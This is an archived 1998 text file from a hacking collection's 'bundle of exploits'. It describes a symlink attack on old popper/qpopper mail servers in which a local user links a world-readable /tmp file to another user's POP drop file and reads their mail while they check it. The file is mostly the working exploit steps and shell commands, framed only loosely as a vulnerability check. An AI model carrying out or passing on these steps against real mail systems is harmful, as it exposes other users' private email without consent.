home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Hacking & Misc / bundle of exploits.sit / bundle of exploits / popper.txt < prev    next >
Text File  |  1998-07-17  |  669b  |  19 lines
  1.  
  2. Some versions of popper and qpopper from qualcomm allow you to read
  3. other peoples email.  There are quite a few situations in which you
  4. need your mail spool directory chmodded 1777.  If you have local users
  5. on a machine with the mail spool directory, they can create symbolic
  6. links from the temporary pop drop box to a file that they can read.
  7.  
  8. See if youre vulnerable:
  9.  
  10.         1) touch /tmp/lumpy; chmod 777 /tmp/lumpy
  11.         2) ln -s /tmp/lumpy /var/mail/.luser.pop
  12.         3) wait for them to check their email.
  13.         4) while they are reading it from the pop
  14.            server, look at the file in the tmp dir.
  15.  
  16. Apparently it is fixed in the newest version.
  17.  
  18.  
  19.